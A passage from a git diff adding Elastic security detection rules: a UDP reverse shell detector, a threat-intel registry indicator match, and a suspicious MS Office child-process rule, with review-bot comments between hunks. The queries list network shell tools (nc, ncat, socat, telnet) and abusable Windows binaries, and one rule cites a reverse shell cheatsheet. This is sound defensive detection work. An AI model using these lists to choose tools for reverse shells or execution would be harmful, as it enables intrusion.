you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + 
"subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6.json new file mode 100644 index 00000000000..fb46b1f60fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via UDP", + "query": "sample by host.id, process.pid, process.parent.pid\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"executed\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n )]\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and auditd.data.a1 == \"2\"]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connected-to\" and\n process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and network.direction == \"egress\" and destination.ip != null and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + 
"references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a1", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + 
"subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_6.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_6.json new file mode 100644 index 00000000000..0a679843b0b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_6.json 
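Review bot: The socket stage of the sequence now requires `auditd.data.a1 == "2"`, an exact match, where version 5 accepted `("2", "802")`; if a1 is the raw hex `type` argument of socket(2) as the earlier `802` (SOCK_DGRAM|SOCK_NONBLOCK) value suggests, then datagram sockets opened with SOCK_NONBLOCK or SOCK_CLOEXEC ORed in — `802`, `80002`, `80802` — no longer match, and the non-blocking case covered by version 5 is a regression. Suggest `auditd.data.a1 : ("2", "802", "80002", "80802")` so the common flag combinations are kept. Dropping the former `a0 == "2"` (AF_INET) check also lets AF_INET6 datagram sockets through, which is reasonable for a UDP rule but worth a word in the description, which still only says "UDP connection".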
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains registry data.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel Windows Registry Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. 
Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS 
VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry.path:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 99, + "rule_id": "a61809f3-fb5b-465c-8bff-23a8a068ac60", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", 
+ "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "registry.path", + "type": "mapping", + "value": "threat.indicator.registry.path" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 6 + }, + "id": "a61809f3-fb5b-465c-8bff-23a8a068ac60_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_111.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_111.json new file mode 100644 index 00000000000..2f7e92ec9f1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_111.json 
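Review bot: The event-side `index` list (`logs-*`, `filebeat-*`) overlaps the indicator-side `threat_index` (`filebeat-*`, `logs-ti_*`), so the indicator documents themselves are in scope for the `registry.path:*` source query; this presumably does not self-match because indicators carry `threat.indicator.registry.path` rather than a top-level `registry.path`, but the `labels.is_ioc_transform_source` exclusion exists only in `threat_query`, and a short comment in the rule's `note` explaining why no equivalent exclusion is needed on the event side would save the next maintainer the same question. On consistency, the `tags` array lacks the `Domain: Endpoint` and `Use Case: Threat Detection` tags every other rule added in this commit carries, and lists only `Data Source: Elastic Endgame` although `index` also covers winlogbeat, auditbeat and filebeat data.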
@@ -0,0 +1,151 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Office Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Office Child Process\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\n \"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\",\n \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\"\n ) and\n process.name : (\n \"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\",\n \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\",\n \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\",\n \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\", \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\",\n \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\",\n \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\"\n ) and\n not (\n process.parent.name : \"outlook.exe\" and\n process.name : \"rundll32.exe\" and\n process.args : 
\"shell32.dll,Control_RunDLL\" and\n process.args : \"srchadmin.dll\"\n )\n", + "references": [ + "https://www.elastic.co/blog/vulnerability-summary-follina" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + 
"reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "a624863f-a70d-417f-a7d2-7a404638d47f_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_112.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_112.json new file mode 100644 index 00000000000..b68b1353054 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_112.json 
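Review bot: The false-positive section of `note` states "This activity is unlikely to happen legitimately", yet the `process.name` list includes `explorer.exe` and the parent list includes `outlook.exe`, a combination that ordinary users trigger when opening an attachment's folder from the mail client; the same absolute wording appears in the `_112` hunk below. Suggest softening the guidance to something like `Office applications spawning explorer.exe or rundll32.exe can occur in benign workflows; review the command line and document source before adding an exception.` so analysts are not steered into treating every hit as malicious. The only difference between the `_111` and `_112` hunks is the `logs-endpoint.events.process-*` index narrowing and the version number, so if the package intends to ship only the latest version of each rule, the `_111` file may be redundant.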
@@ -0,0 +1,151 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Office Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Office Child Process\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
